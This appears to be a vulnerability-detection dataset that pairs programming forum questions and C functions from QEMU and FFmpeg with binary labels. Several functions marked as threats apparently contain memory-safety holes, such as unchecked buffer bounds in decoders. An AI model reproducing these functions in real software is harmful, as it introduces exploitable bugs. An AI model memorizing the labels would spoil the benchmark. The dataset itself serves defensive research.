problem
stringlengths
26
131k
labels
class label
2 classes
Trying to get random value in specified range? : <p>for one of my assignments I am trying to generate a random number between 16-26 (both inclusive). I've read around and tried different methods but for some reason it goes over the specified range. This is what I have at the moment:</p> <pre><code>int dealerHand = 16 + (int) (Math.random() * ((26 - 16) + 16)); </code></pre> <p>Any idea on why this isn't working? Thanks!</p>
0debug
AWS BOTO3 S3 python - An error occurred (404) when calling the HeadObject operation: Not Found : <p>I am trying download a directory inside s3 bucket. I am trying to use transfer to download a directory from S3 bucket but I am getting an error as "An error occurred (404) when calling the HeadObject operation: Not Found". Please help.</p> <pre><code>S3 structure: **Bucket Folder1 File1** </code></pre> <p>Note: Trying to download Folder1</p> <pre><code>transfer.download_file(self.bucket_name, self.dir_name, self.file_dir + self.dir_name) </code></pre>
0debug
AzureDevOps - Link git commit or branch to work item via command line : <p>I've worked on projects with a Jira integration where I simply had to include the ticket number in the commit or branch name and that work would automatically link with the ticket in Jira. Exe:</p> <blockquote> <p><code>git commit -am '123 some commit'</code></p> </blockquote> <p>And on the ticket you'd see a link to the commit.</p> <p><strong>How can I do that with Azure Dev Ops?</strong></p> <p>I know how to manually do it via Visual Studio or in the ticket itself, but I want to do it through the command line only.</p>
0debug
how to include a prototype in typescript : <p>I am learning angular 2 and I have written a ts definition for a truncate method I want to use in one of my services.</p> <p>truncate.ts</p> <pre><code>interface String { truncate(max: number, decorator: string): string; } String.prototype.truncate = function(max, decorator){ decorator = decorator || '...'; return (this.length &gt; max ? this.substring(0,max)+decorator : this); }; </code></pre> <p>How do I import this into another typescript module or at least make it available to use globally. </p>
0debug
int qemu_get_buffer(QEMUFile *f, uint8_t *buf, int size1) { int size, l; if (f->is_write) { abort(); } size = size1; while (size > 0) { l = f->buf_size - f->buf_index; if (l == 0) { qemu_fill_buffer(f); l = f->buf_size - f->buf_index; if (l == 0) { break; } } if (l > size) { l = size; } memcpy(buf, f->buf + f->buf_index, l); f->buf_index += l; buf += l; size -= l; } return size1 - size; }
1threat
static int ir2_decode_frame(AVCodecContext *avctx, void *data, int *got_frame, AVPacket *avpkt) { const uint8_t *buf = avpkt->data; int buf_size = avpkt->size; Ir2Context * const s = avctx->priv_data; AVFrame *picture = data; AVFrame * const p = &s->picture; int start, ret; if(p->data[0]) avctx->release_buffer(avctx, p); p->reference = 1; p->buffer_hints = FF_BUFFER_HINTS_VALID | FF_BUFFER_HINTS_PRESERVE | FF_BUFFER_HINTS_REUSABLE; if ((ret = avctx->reget_buffer(avctx, p)) < 0) { av_log(s->avctx, AV_LOG_ERROR, "reget_buffer() failed\n"); return ret; } start = 48; if (start >= buf_size) { av_log(s->avctx, AV_LOG_ERROR, "input buffer size too small (%d)\n", buf_size); return AVERROR_INVALIDDATA; } s->decode_delta = buf[18]; #ifndef BITSTREAM_READER_LE for (i = 0; i < buf_size; i++) buf[i] = ff_reverse[buf[i]]; #endif init_get_bits(&s->gb, buf + start, (buf_size - start) * 8); if (s->decode_delta) { ir2_decode_plane(s, avctx->width, avctx->height, s->picture.data[0], s->picture.linesize[0], ir2_luma_table); ir2_decode_plane(s, avctx->width >> 2, avctx->height >> 2, s->picture.data[2], s->picture.linesize[2], ir2_luma_table); ir2_decode_plane(s, avctx->width >> 2, avctx->height >> 2, s->picture.data[1], s->picture.linesize[1], ir2_luma_table); } else { ir2_decode_plane_inter(s, avctx->width, avctx->height, s->picture.data[0], s->picture.linesize[0], ir2_luma_table); ir2_decode_plane_inter(s, avctx->width >> 2, avctx->height >> 2, s->picture.data[2], s->picture.linesize[2], ir2_luma_table); ir2_decode_plane_inter(s, avctx->width >> 2, avctx->height >> 2, s->picture.data[1], s->picture.linesize[1], ir2_luma_table); } *picture = s->picture; *got_frame = 1; return buf_size; }
1threat
Jira Webhook to Google Calendar API : <p><br> I am having hard times figuring out how to create a JIRA webhook that creates a google calendar event after an ISSUE has been created in JIRA. <BR> Start and end times of this event should be taken from custom fields in that created Issue. <BR> Thanks in advance.</p>
0debug
static void d3d11va_device_uninit(AVHWDeviceContext *hwdev) { AVD3D11VADeviceContext *device_hwctx = hwdev->hwctx; if (device_hwctx->device) ID3D11Device_Release(device_hwctx->device); if (device_hwctx->device_context) ID3D11DeviceContext_Release(device_hwctx->device_context); if (device_hwctx->video_device) ID3D11VideoDevice_Release(device_hwctx->video_device); if (device_hwctx->video_context) ID3D11VideoContext_Release(device_hwctx->video_context); if (device_hwctx->lock == d3d11va_default_lock) CloseHandle(device_hwctx->lock_ctx); }
1threat
Makefile with source get error `No such file or directory` : <p>I have a really simple <code>Makefile</code> that's doing <code>source</code> to set ENV variables. But it doesn't work if I call it from <code>Makefile</code></p> <p>I get this error</p> <pre><code>make dev source ./bin/authenticate.sh make: source: No such file or directory make: *** [dev] Error 1 </code></pre> <p>The script exists. </p> <p>If I run this in command-line it works. </p> <pre><code>source ./bin/authenticate.sh Works! </code></pre> <p>This is my <code>Makefile</code></p> <pre><code>test: pytest -s dev: source ./bin/authenticate.sh </code></pre> <p>I'm using OSX. I'm not sure if this would make a difference.</p>
0debug
Necesito realizar un procedimiento o vista en pl sql que mu muestre los pagos realizados en un periodo de fechas : Estoy trabajando con un sistema, tengo dos tablas 'Facturas' y 'Pagos Factura'. En la tabla 'Factura' tiene las columnas 'Fecha de Factura' y 'Fecha de vencimiento'. Lo que necesito realizar es un procedimiento o vista en pl sql, donde tome el id de la factura, y cheque en la tabla 'Pagos Factura' los pagos realizados de esa factura en el periodo de 'Fecha Factura' y 'Fecha de vencimiento' ----------------------------------------------------------------------------- I am working with a system, I have two tables 'Invoices' and 'Payments Invoice'. In the table 'Invoice' you have the columns 'Invoice Date' and 'Due Date'. What I need to do is an examination or view, where to take the examination of the invoice, and verify in the table 'Payments Invoice' the payments made of that invoice in the period of 'Invoice Date' and 'Due Date'
0debug
Is it possible to show div when hover? Why is my code in css not working ? : Here is my code, I just copy this from a tutorial and I just modify the code for my use, but it turned out not what I want, it's not working here is my css .project-item h3{ cursor: pointer; } #project-contentOne{ display: none; } .project-item :hover #project-contentOne{ display: block; } and my html is <div class="project-item"> <h3>University-wide High Spped Information Network</h3> <div id="project-contentOne" class="p-content"> <p>University wide High-Speed Information Network is a component of the 5-year project plan which is the eCLSU. It includes the development, deployment, and acquisition of communication infrastructure.</p> <p>This component installs and deploys communication equipment and systems that interconnect the colleges and units within the main campus and the satellite research and laboratory schools and facilities. This infrastructure must be able to support handling large and simultaneous transfer of data between different users across the campus to achieve convenience and efficiency in university operations</p> </div> </div> I want also to put images in the content so I use the div Thank you in advance
0debug
static inline int coeff_unpack_golomb(GetBitContext *gb, int qfactor, int qoffset) { int sign, coeff; uint32_t buf; OPEN_READER(re, gb); UPDATE_CACHE(re, gb); buf = GET_CACHE(re, gb); if (buf & 0xAA800000) { buf >>= 32 - 8; SKIP_BITS(re, gb, ff_interleaved_golomb_vlc_len[buf]); coeff = ff_interleaved_ue_golomb_vlc_code[buf]; } else { unsigned ret = 1; do { buf >>= 32 - 8; SKIP_BITS(re, gb, FFMIN(ff_interleaved_golomb_vlc_len[buf], 8)); if (ff_interleaved_golomb_vlc_len[buf] != 9) { ret <<= (ff_interleaved_golomb_vlc_len[buf] - 1) >> 1; ret |= ff_interleaved_dirac_golomb_vlc_code[buf]; break; } ret = (ret << 4) | ff_interleaved_dirac_golomb_vlc_code[buf]; UPDATE_CACHE(re, gb); buf = GET_CACHE(re, gb); } while (ret<0x8000000U && BITS_AVAILABLE(re, gb)); coeff = ret - 1; } if (coeff) { coeff = (coeff * qfactor + qoffset + 2) >> 2; sign = SHOW_SBITS(re, gb, 1); LAST_SKIP_BITS(re, gb, 1); coeff = (coeff ^ sign) - sign; } CLOSE_READER(re, gb); return coeff; }
1threat
void net_slirp_redir(const char *redir_str) { struct slirp_config_str *config; if (QTAILQ_EMPTY(&slirp_stacks)) { config = qemu_malloc(sizeof(*config)); pstrcpy(config->str, sizeof(config->str), redir_str); config->flags = SLIRP_CFG_HOSTFWD | SLIRP_CFG_LEGACY; config->next = slirp_configs; slirp_configs = config; return; } slirp_hostfwd(QTAILQ_FIRST(&slirp_stacks), NULL, redir_str, 1); }
1threat
void kvm_setup_guest_memory(void *start, size_t size) { #ifdef CONFIG_VALGRIND_H VALGRIND_MAKE_MEM_DEFINED(start, size); #endif if (!kvm_has_sync_mmu()) { int ret = qemu_madvise(start, size, QEMU_MADV_DONTFORK); if (ret) { perror("qemu_madvise"); fprintf(stderr, "Need MADV_DONTFORK in absence of synchronous KVM MMU\n"); exit(1); } } }
1threat
React - Dynamically Import Components : <p>I have a page which renders different components based on user input. At the moment, I have hard coded the imports for each component as shown below:</p> <pre><code> import React, { Component } from 'react' import Component1 from './Component1' import Component2 from './Component2' import Component3 from './Component3' class Main extends Component { render() { var components = { 'Component1': Component1, 'Component2': Component2, 'Component3': Component3 }; var type = 'Component1'; // just an example var MyComponent = Components[type]; return &lt;MyComponent /&gt; } } export default Main </code></pre> <p>However, I change/add components all the time. Is there a way to perhaps have a file which stores ONLY the names and paths of the components and these are then imported dynamically in another file?</p>
0debug
What is causing this: Cannot jump from switch statement to this case label : <p>This is a switch statement that I am getting errors on:</p> <pre><code> switch (transaction.transactionState) { case SKPaymentTransactionStatePurchasing: // show wait view here statusLabel.text = @"Processing..."; break; case SKPaymentTransactionStatePurchased: [[SKPaymentQueue defaultQueue] finishTransaction:transaction]; // remove wait view and unlock iClooud Syncing statusLabel.text = @"Done!"; NSError *error = nil; [SFHFKeychainUtils storeUsername:@"IAPNoob01" andPassword:@"whatever" forServiceName: kStoredData updateExisting:YES error:&amp;error]; // apply purchase action - hide lock overlay and [oStockLock setBackgroundImage:nil forState:UIControlStateNormal]; // do other thing to enable the features break; case SKPaymentTransactionStateRestored: [[SKPaymentQueue defaultQueue] finishTransaction:transaction]; // remove wait view here statusLabel.text = @""; break; case SKPaymentTransactionStateFailed: if (transaction.error.code != SKErrorPaymentCancelled) { NSLog(@"Error payment cancelled"); } [[SKPaymentQueue defaultQueue] finishTransaction:transaction]; // remove wait view here statusLabel.text = @"Purchase Error!"; break; default: break; } </code></pre> <p>The last two cases, plus the default, are giving me the following error:</p> <blockquote> <p>Cannot jump from switch statement to this case label</p> </blockquote> <p>I have used the switch statement many, many times; this is the first time I have seen this. The code has been copied from a tutorial (<a href="http://xcodenoobies.blogspot.com/2012/04/implementing-inapp-purchase-in-xcode.html" rel="noreferrer">here</a>), which I am trying to adapt for my app. Would appreciate the help on this one. SD</p>
0debug
Display ='Grid' is not working in IE? is any soluting to fix it or not? : I am using Display ='grid' in CSS. it's works fine for chrome & Mozzila. but it's not working on IE. Any CSS Trick or any solution?
0debug
When should we use android.arch.lifecycle:compiler (or android.arch.lifecycle:common-java8)? : <p>Currently, we are using <code>LiveData</code>, <code>ViewModel</code> and <code>Room</code> in our project.</p> <p>We are using Java 8.</p> <p>We use the following in <code>build.gradle</code></p> <pre><code>// ViewModel and LiveData implementation "android.arch.lifecycle:extensions:1.1.1" // Room (use 1.1.0-beta1 for latest beta) implementation "android.arch.persistence.room:runtime:1.0.0" annotationProcessor "android.arch.persistence.room:compiler:1.0.0" </code></pre> <p>I was wondering, when do we need to use</p> <pre><code>annotationProcessor "android.arch.lifecycle:compiler:1.1.1" </code></pre> <p>(Or <code>implementation "android.arch.lifecycle:common-java8:1.1.1"</code> since we are using Java 8?!)</p> <p>Currently, our code works fine, without using <code>lifecycle:compiler</code> or <code>lifecycle:common-java8</code>.</p>
0debug
Microservice architecture - carry message through services when order doesn't matter : <p><strong>Tl;dr</strong>: "How can I push a message through a bunch of asynchronous, unordered microservices and know when that message has made it through each of them?"</p> <p>I'm struggling to find the right messaging system/protocol for a specific microservices architecture. This isn't a "which is best" question, but a question about what my options are for a design pattern/protocol.</p> <p><a href="https://i.stack.imgur.com/MbHRf.png" rel="noreferrer"><img src="https://i.stack.imgur.com/MbHRf.png" alt="Diagram"></a></p> <ul> <li>I have a <em>message</em> on the beginning queue. Let's say a RabbitMQ message with serialized JSON</li> <li>I need that message to go through an arbitrary number of microservices</li> <li>Each of those microservices are long running, must be independent, and may be implemented in a variety of languages</li> <li>The order of services the message goes through does not matter. In fact, it should not be synchronous.</li> <li>Each service can <em>append</em> data to the original message, but that data is ignored by the other services. There should be <em>no</em> merge conflicts (each service writes a unique key). No service will change or destroy data.</li> <li>Once <em>all the services have had their turn</em>, the message should be published to a second RabbitMQ queue with the original data and the new data.</li> <li>The microservices will have no other side-effects. If this were all in one monolithic application (and in the same language), functional programming would be perfect.</li> </ul> <p>So, the question is, what is an appropriate way to manage that message through the various services? I <strong>don't</strong> want to have to do one at a time, and the order isn't important. But, if that's the case, how can the system know when all the services have had their whack and the final message can be written onto the ending queue (to have the next batch of services have their go).</p> <p>The only, semi-elegant solution I could come up with was </p> <ol> <li>to have the first service that encounters a message write that message to common storage (say mongodb)</li> <li>Have each service do its thing, mark that it has completed for that message, and then check to see if all the services have had their turn</li> <li>If so, that last service would publish the message</li> </ol> <p>But that still requires each service to be aware of all the other services <em>and</em> requires each service to leave its mark. Neither of those is desired.</p> <p>I am open to a "Shepherd" service of some kind.</p> <p>I would appreciate any options that I have missed, and am willing to concede that their may be a better, fundamental design.</p> <p>Thank you.</p>
0debug
static int ide_drive_post_load(void *opaque, int version_id) { IDEState *s = opaque; if (s->identify_set) { blk_set_enable_write_cache(s->blk, !!(s->identify_data[85] & (1 << 5))); } return 0; }
1threat
Compare not working in Eclipse Neon : <p>I am (finally) trying to upgrade to Eclipse Neon from Mars.2. After installing SVN support and the SVNKit (1.8.14) connector, I am able to access my repository. However <em>Compare</em> is not working. </p> <p>If I right click a file that I have modified, and choose <em>Compare with Base from Working Copy</em> a dialog is displayed saying <strong>There are no differences between the selected inputs</strong>. If I choose <em>Team-> Synchronize with Repository</em>, the differences are shown in the Synchronization view. Differences are also shown when comparing to Local History.</p> <p>If I use Tortise SVN from File Explorer the differences from the current version to the Base Working version are shown.</p> <p>Anyone have a solution / suggestion to restore this critical function?</p>
0debug
static int adx_decode_frame(AVCodecContext *avctx, void *data, int *got_frame_ptr, AVPacket *avpkt) { int buf_size = avpkt->size; ADXContext *c = avctx->priv_data; int16_t *samples; const uint8_t *buf = avpkt->data; int num_blocks, ch, ret; if (c->eof) { *got_frame_ptr = 0; return buf_size; } if(AV_RB16(buf) == 0x8000){ int header_size; if ((ret = avpriv_adx_decode_header(avctx, buf, buf_size, &header_size, c->coeff)) < 0) { av_log(avctx, AV_LOG_ERROR, "error parsing ADX header\n"); } c->channels = avctx->channels; if(buf_size < header_size) buf += header_size; buf_size -= header_size; } num_blocks = buf_size / (BLOCK_SIZE * c->channels); if (!num_blocks || buf_size % (BLOCK_SIZE * avctx->channels)) { if (buf_size >= 4 && (AV_RB16(buf) & 0x8000)) { c->eof = 1; *got_frame_ptr = 0; return avpkt->size; } } c->frame.nb_samples = num_blocks * BLOCK_SAMPLES; if ((ret = avctx->get_buffer(avctx, &c->frame)) < 0) { av_log(avctx, AV_LOG_ERROR, "get_buffer() failed\n"); return ret; } samples = (int16_t *)c->frame.data[0]; while (num_blocks--) { for (ch = 0; ch < c->channels; ch++) { if (adx_decode(c, samples + ch, buf, ch)) { c->eof = 1; buf = avpkt->data + avpkt->size; break; } buf_size -= BLOCK_SIZE; buf += BLOCK_SIZE; } samples += BLOCK_SAMPLES * c->channels; } *got_frame_ptr = 1; *(AVFrame *)data = c->frame; return buf - avpkt->data; }
1threat
How string is stored in C# : <p>After reading 2 different post on how the string is stored I am little confused which one is right.</p> <p>Please find the below links:<br> <a href="https://stackoverflow.com/questions/10782690/how-are-string-and-char-types-stored-in-memory-in-net">How are String and Char types stored in memory in .NET?</a> <br> <a href="https://stackoverflow.com/questions/3669199/c-sharp-is-string-actually-an-array-of-chars-or-does-it-just-have-an-indexer">C# - is string actually an array of chars or does it just have an indexer?</a></p>
0debug
static void *legacy_s390_alloc(size_t size) { void *mem; mem = mmap((void *) 0x800000000ULL, size, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS | MAP_FIXED, -1, 0); return mem == MAP_FAILED ? NULL : mem; }
1threat
How to record a call in Android pie? : <p>Basically I've done call recording but it's not working up to Oreo. I read an article in Wich google stop call recording in up to Oreo anyone have any idea how to record call in Android pie? Code comments will be appreciated. Thanks </p>
0debug
static uint32_t parse_enumeration(char *str, EnumTable *table, uint32_t not_found_value) { uint32_t ret = not_found_value; while (table->name != NULL) { if (strcmp(table->name, str) == 0) { ret = table->value; break; } table++; } return ret; }
1threat
adapter Ecto.Adapters.Postgres was not compiled : <p>I am not able to create my Phoenix project. Would love some advice on how to fix it.</p> <p>Setup details:</p> <ul> <li>Ubuntu 16.04.4 LTS </li> <li>Erlang/OTP 21 [erts-10.1] [source] [64-bit] [smp:1:1] [ds:1:1:10] [async-threads:1] [hipe] </li> <li>Elixir 1.7.3 (compiled with Erlang/OTP 20)</li> <li>Mix 1.7.3 (compiled with Erlang/OTP 20)</li> <li>Ecto v3.0.0</li> </ul> <p>I am following the <a href="https://hexdocs.pm/phoenix/up_and_running.html#content" rel="noreferrer">Phoenix Up and Running</a> to make an app. </p> <pre><code>mix phx.new hello cd hello mix ecto.create </code></pre> <p>last command gives me:</p> <pre><code> == Compilation error in file lib/hello/repo.ex == ** (ArgumentError) adapter Ecto.Adapters.Postgres was not compiled, ensure it is correct and it is included as a project dependency lib/ecto/repo/supervisor.ex:71: Ecto.Repo.Supervisor.compile_config/2 lib/hello/repo.ex:2: (module) (stdlib) erl_eval.erl:680: :erl_eval.do_apply/6 (elixir) lib/kernel/parallel_compiler.ex:206: anonymous fn/4 in Kernel.ParallelCompiler.spawn_workers/6 </code></pre> <p>I have postgres installed. I have postgres super user. </p>
0debug
static void read_sbr_envelope(SpectralBandReplication *sbr, GetBitContext *gb, SBRData *ch_data, int ch) { int bits; int i, j, k; VLC_TYPE (*t_huff)[2], (*f_huff)[2]; int t_lav, f_lav; const int delta = (ch == 1 && sbr->bs_coupling == 1) + 1; const int odd = sbr->n[1] & 1; if (sbr->bs_coupling && ch) { if (ch_data->bs_amp_res) { bits = 5; t_huff = vlc_sbr[T_HUFFMAN_ENV_BAL_3_0DB].table; t_lav = vlc_sbr_lav[T_HUFFMAN_ENV_BAL_3_0DB]; f_huff = vlc_sbr[F_HUFFMAN_ENV_BAL_3_0DB].table; f_lav = vlc_sbr_lav[F_HUFFMAN_ENV_BAL_3_0DB]; } else { bits = 6; t_huff = vlc_sbr[T_HUFFMAN_ENV_BAL_1_5DB].table; t_lav = vlc_sbr_lav[T_HUFFMAN_ENV_BAL_1_5DB]; f_huff = vlc_sbr[F_HUFFMAN_ENV_BAL_1_5DB].table; f_lav = vlc_sbr_lav[F_HUFFMAN_ENV_BAL_1_5DB]; } } else { if (ch_data->bs_amp_res) { bits = 6; t_huff = vlc_sbr[T_HUFFMAN_ENV_3_0DB].table; t_lav = vlc_sbr_lav[T_HUFFMAN_ENV_3_0DB]; f_huff = vlc_sbr[F_HUFFMAN_ENV_3_0DB].table; f_lav = vlc_sbr_lav[F_HUFFMAN_ENV_3_0DB]; } else { bits = 7; t_huff = vlc_sbr[T_HUFFMAN_ENV_1_5DB].table; t_lav = vlc_sbr_lav[T_HUFFMAN_ENV_1_5DB]; f_huff = vlc_sbr[F_HUFFMAN_ENV_1_5DB].table; f_lav = vlc_sbr_lav[F_HUFFMAN_ENV_1_5DB]; } } for (i = 0; i < ch_data->bs_num_env; i++) { if (ch_data->bs_df_env[i]) { if (ch_data->bs_freq_res[i + 1] == ch_data->bs_freq_res[i]) { for (j = 0; j < sbr->n[ch_data->bs_freq_res[i + 1]]; j++) ch_data->env_facs_q[i + 1][j] = ch_data->env_facs_q[i][j] + delta * (get_vlc2(gb, t_huff, 9, 3) - t_lav); } else if (ch_data->bs_freq_res[i + 1]) { for (j = 0; j < sbr->n[ch_data->bs_freq_res[i + 1]]; j++) { k = (j + odd) >> 1; ch_data->env_facs_q[i + 1][j] = ch_data->env_facs_q[i][k] + delta * (get_vlc2(gb, t_huff, 9, 3) - t_lav); } } else { for (j = 0; j < sbr->n[ch_data->bs_freq_res[i + 1]]; j++) { k = j ? 2*j - odd : 0; ch_data->env_facs_q[i + 1][j] = ch_data->env_facs_q[i][k] + delta * (get_vlc2(gb, t_huff, 9, 3) - t_lav); } } } else { ch_data->env_facs_q[i + 1][0] = delta * get_bits(gb, bits); for (j = 1; j < sbr->n[ch_data->bs_freq_res[i + 1]]; j++) ch_data->env_facs_q[i + 1][j] = ch_data->env_facs_q[i + 1][j - 1] + delta * (get_vlc2(gb, f_huff, 9, 3) - f_lav); } } memcpy(ch_data->env_facs_q[0], ch_data->env_facs_q[ch_data->bs_num_env], sizeof(ch_data->env_facs_q[0])); }
1threat
int ff_h264_decode_ref_pic_marking(H264Context *h, GetBitContext *gb, int first_slice) { int i, ret; MMCO mmco_temp[MAX_MMCO_COUNT], *mmco = mmco_temp; int mmco_index = 0; if (h->nal_unit_type == NAL_IDR_SLICE) { skip_bits1(gb); if (get_bits1(gb)) { mmco[0].opcode = MMCO_LONG; mmco[0].long_arg = 0; mmco_index = 1; } } else { if (get_bits1(gb)) { for (i = 0; i < MAX_MMCO_COUNT; i++) { MMCOOpcode opcode = get_ue_golomb_31(gb); mmco[i].opcode = opcode; if (opcode == MMCO_SHORT2UNUSED || opcode == MMCO_SHORT2LONG) { mmco[i].short_pic_num = (h->curr_pic_num - get_ue_golomb(gb) - 1) & (h->max_pic_num - 1); #if 0 if (mmco[i].short_pic_num >= h->short_ref_count || !h->short_ref[mmco[i].short_pic_num]) { av_log(s->avctx, AV_LOG_ERROR, "illegal short ref in memory management control " "operation %d\n", mmco); return -1; } #endif } if (opcode == MMCO_SHORT2LONG || opcode == MMCO_LONG2UNUSED || opcode == MMCO_LONG || opcode == MMCO_SET_MAX_LONG) { unsigned int long_arg = get_ue_golomb_31(gb); if (long_arg >= 32 || (long_arg >= 16 && !(opcode == MMCO_SET_MAX_LONG && long_arg == 16) && !(opcode == MMCO_LONG2UNUSED && FIELD_PICTURE(h)))) { av_log(h->avctx, AV_LOG_ERROR, "illegal long ref in memory management control " "operation %d\n", opcode); return -1; } mmco[i].long_arg = long_arg; } if (opcode > (unsigned) MMCO_LONG) { av_log(h->avctx, AV_LOG_ERROR, "illegal memory management control operation %d\n", opcode); return -1; } if (opcode == MMCO_END) break; } mmco_index = i; } else { if (first_slice) { ret = ff_generate_sliding_window_mmcos(h, first_slice); if (ret < 0 && h->avctx->err_recognition & AV_EF_EXPLODE) return ret; } mmco_index = -1; } } if (first_slice && mmco_index != -1) { memcpy(h->mmco, mmco_temp, sizeof(h->mmco)); h->mmco_index = mmco_index; } else if (!first_slice && mmco_index >= 0 && (mmco_index != h->mmco_index || check_opcodes(h->mmco, mmco_temp, mmco_index))) { av_log(h->avctx, AV_LOG_ERROR, "Inconsistent MMCO state between slices [%d, %d]\n", mmco_index, h->mmco_index); return AVERROR_INVALIDDATA; } return 0; }
1threat
From List to Jagged Array : <p>I am trying to convert a <code>List&lt;T&gt;</code> to a <code>Jagged Array T [][]</code>. But each array inside the Jagged Array is repeating the first N Elements of the List. I know that my code is doing exactly that, but how can I iterate over my list in a different way so I dont go through the same N elements?</p> <p>Please ignore the <code>DataTree&lt;T&gt;</code> type, its just a reference data structure topology to create the Jagged Array.</p> <pre><code> public static T[][] ToJaggedArrray&lt;T&gt;(this List&lt;T&gt; data, DataTree&lt;T&gt; dataTree) { // Get total elements on each row //dataTree.DataCount = total elements in data structure int totalElementsPerArray = dataTree.DataCount / dataTree.BranchCount; // dataTree.BranchCount = number of elemets/rows int numElements = dataTree.BranchCount; T[][] outPut = new T[numElements][]; for (int i = 0; i &lt; outPut.Length; i++) { T[] temp = new T[totalElementsPerArray]; for (int j = 0; j &lt; temp.Length; j++) { temp[j] = data[j]; } outPut[i] = temp; } return outPut; } /* Output: 54 19 83 80 28 48 46 16 52 38 41 10 Element(0): 54 19 83 80 Element(1): 54 19 83 80 Element(2): 54 19 83 80 */ /* Expected Output: 54 19 83 80 28 48 46 16 52 38 41 10 Element(0): 54 19 83 80 Element(1): 28 48 46 16 Element(2): 52 38 41 10 */ </code></pre>
0debug
TypeError: Cannot property of value between two getJSON functions : When the length of my 2 json's are the same, I dont get an error but when they arent I get a `TypeError: Connt read property of undefined`. JSON: json1: [ { "date": "2019-07-05", "x": 1246567, "y": 598045 }, { "date": "2019-07-06", "x": 1021607, "y": 452854 }, { "date": "2019-07-07", "x": 1031607, "y": 467854 } ] json2: [ { "date": "2019-07-05", "v": 3132769, "pv": 6643094 }, { "date": "2019-07-06", "v": 2643611, "pv": 6059584 } ] JavaScript $.getJSON(json1, result => { result.forEach((elem, i, array) => { $('#x').text(elem.x); $('#y').text(elem.y); }); $.getJSON(json2, result => { result.forEach((elem, i, array) => { let yo = 0; if ((elem.date.indexOf(json[i].date) !== -1)) { yo = json[i].x/elem.v) $('#v').text(elem.v); $('#pv').text(elem.pv); $('#vpv').text(yo); } }); }); When the length of the arrays's they match each other but when is longer than the other I get `TypeError: Cannot read property x of undefined` (at `json[i].x`). I am even adding the condition `if ((elem.date.indexOf(json[i].date) !== -1))`. I thought that would fix that. But I am still getting the error. How can I fix this?
0debug
F# How to write a function that takes int list or string list : <p>I'm messing around in F# and tried to write a function that can take an <code>int list</code> or a <code>string list</code>. I have written a function that is logically generic, in that I can modify nothing but the type of the argument and it will run with both types of list. But I cannot generically define it to take both.</p> <p>Here is my function, without type annotation:</p> <pre class="lang-ml prettyprint-override"><code>let contains5 xs = List.map int xs |&gt; List.contains 5 </code></pre> <p>When I try to annotate the function to take a generic list, I receive a warning <code>FS0064: the construct causes the code to be less generic than indicated by the type annotations</code>. In theory I shouldn't need to annotate this to be generic, but I tried anyway.</p> <p>I can compile this in two separate files, one with</p> <pre class="lang-ml prettyprint-override"><code>let stringtest = contains5 ["1";"2";"3";"4"] </code></pre> <p>and another with</p> <pre class="lang-ml prettyprint-override"><code>let inttest = contains5 [1;2;3;4;5] </code></pre> <p>In each of these files, compilation succeeds. Alternately, I can send the function definition and one of the tests to the interpreter, and type inference proceeds just fine. If I try to compile, or send to the interpreter, the function definition and both tests, I receive <code>error FS0001: This expression was expected to have type string, but here has type int</code>.</p> <p>Am I misunderstanding how typing should work? I have a function whose code can handle a list of ints or a list of strings. I can successfully test it with either. But I can't use it in a program that handles both?</p>
0debug
import heapq as hq def raw_heap(rawheap): hq.heapify(rawheap) return rawheap
0debug
void bdrv_error_action(BlockDriverState *bs, BlockErrorAction action, bool is_read, int error) { assert(error >= 0); if (action == BLOCK_ERROR_ACTION_STOP) { bdrv_iostatus_set_err(bs, error); qemu_system_vmstop_request_prepare(); send_qmp_error_event(bs, action, is_read, error); qemu_system_vmstop_request(RUN_STATE_IO_ERROR); } else { send_qmp_error_event(bs, action, is_read, error); } }
1threat
static void s390_virtio_bridge_class_init(ObjectClass *klass, void *data) { DeviceClass *dc = DEVICE_CLASS(klass); SysBusDeviceClass *k = SYS_BUS_DEVICE_CLASS(klass); k->init = s390_virtio_bridge_init; dc->no_user = 1; }
1threat
Apply Middleware to all routes except `setup/*` in Laravel 5.4 : <p>I'm experimenting with Middleware in my Laravel application. I currently have it set up to run on every route for an authenticated user, however, I want it to ignore any requests that begin with the <code>setup</code> URI.</p> <p>Here is what my <code>CheckOnboarding</code> middleware method looks like:</p> <pre><code>public function handle($request, Closure $next) { /** * Check to see if the user has completed the onboarding, if not redirect. * Also checks that the requested URI isn't the setup route to ensure there isn't a redirect loop. */ if ($request-&gt;user()-&gt;onboarding_complete == false &amp;&amp; $request-&gt;path() != 'setup') { return redirect('setup'); } else { return $next($request); } } </code></pre> <p>This is being used in my routes like this:</p> <pre><code>Route::group(['middleware' =&gt; ['auth','checkOnboarding']], function () { Route::get('/home', 'HomeController@index'); Route::get('/account', 'AccountController@index'); Route::group(['prefix' =&gt; 'setup'], function () { Route::get('/', 'OnboardingController@index')-&gt;name('setup'); Route::post('/settings', 'SettingsController@store'); }); }); </code></pre> <p>Now, if I go to <code>/home</code> or <code>/account</code> I get redirected to <code>/setup</code> as you would expect. This originally caused a redirect loop error hence why <code>&amp; $request-&gt;path() != 'setup'</code> is in the Middleware.</p> <p>I feel like this is a really clunky way of doing it, and obviously doesn't match anything after <code>setup</code> like the <code>setup/settings</code> route I have created.</p> <p>Is there a better way to have this Middleware run on all routes for a user, but also set certain routes that should be exempt from this check? </p>
0debug
static void virtio_scsi_hotplug(HotplugHandler *hotplug_dev, DeviceState *dev, Error **errp) { VirtIODevice *vdev = VIRTIO_DEVICE(hotplug_dev); VirtIOSCSI *s = VIRTIO_SCSI(vdev); SCSIDevice *sd = SCSI_DEVICE(dev); if (s->ctx && !s->dataplane_disabled) { if (blk_op_is_blocked(sd->conf.blk, BLOCK_OP_TYPE_DATAPLANE, errp)) { return; } blk_op_block_all(sd->conf.blk, s->blocker); } if ((vdev->guest_features >> VIRTIO_SCSI_F_HOTPLUG) & 1) { virtio_scsi_push_event(s, sd, VIRTIO_SCSI_T_TRANSPORT_RESET, VIRTIO_SCSI_EVT_RESET_RESCAN); } }
1threat
